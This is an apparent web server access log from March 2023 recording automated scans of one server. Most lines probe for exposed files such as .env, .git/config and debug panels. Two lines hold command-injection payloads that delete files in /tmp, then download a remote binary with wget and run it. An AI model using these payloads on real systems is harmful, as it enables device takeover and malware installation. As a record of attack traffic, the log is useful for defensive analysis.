20.163.14.232 - - [04/Mar/2023:03:49:09 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:03:49:10 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:03:49:10 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:03:49:10 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
109.98.208.52 - - [04/Mar/2023:03:51:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
109.98.208.52 - - [04/Mar/2023:03:51:58 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
103.90.163.16 - - [04/Mar/2023:03:56:10 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
45.155.126.211 - - [04/Mar/2023:03:58:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
134.209.154.116 - - [04/Mar/2023:04:00:43 +0100] "\x16\x03\x01" 501 318 "-" "-"
134.209.154.116 - - [04/Mar/2023:04:00:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
134.209.154.116 - - [04/Mar/2023:04:00:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
134.209.154.116 - - [04/Mar/2023:04:00:44 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
51.158.37.156 - - [04/Mar/2023:04:01:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [04/Mar/2023:04:01:53 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
193.56.29.190 - - [04/Mar/2023:04:03:02 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
193.56.29.190 - - [04/Mar/2023:04:03:03 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
94.34.146.227 - - [04/Mar/2023:04:07:48 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
4.17.224.134 - - [04/Mar/2023:04:12:53 +0100] "GET /web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
